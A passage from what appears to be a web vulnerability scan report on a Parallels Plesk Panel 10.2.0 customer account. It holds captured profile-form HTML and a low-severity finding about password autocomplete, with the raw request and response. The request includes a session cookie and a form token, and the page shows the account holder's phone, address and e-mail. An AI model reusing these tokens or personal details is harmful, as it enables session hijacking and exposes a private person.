items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>My Profile</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-vcard-contactName'>Hoyt LLC Research</span>

</div>
</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="h02332" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="h02332@gmail.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>

</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-login'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-login'>xsscx</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='general-account-language-form-row' class='form-row' >
<div class='field-name'><label for='general-account-language'>Panel language&nbsp;</label></div>
<div class='field-value'>

<select name="general[account][language]" id="general-account-language">
<option value="en-US" label="ENGLISH (United States)" selected="selected">ENGLISH (United States)</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="Hoyt LLC Research" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="+1 339 206 1886" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80">PO BOX 250
</textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="Accord" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="MA" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="02018" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="..land Islands">..land Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

6.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /smb/user/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:36 GMT
Connection: close
Content-Length: 23628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Create User Account - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/create" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fcreate' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
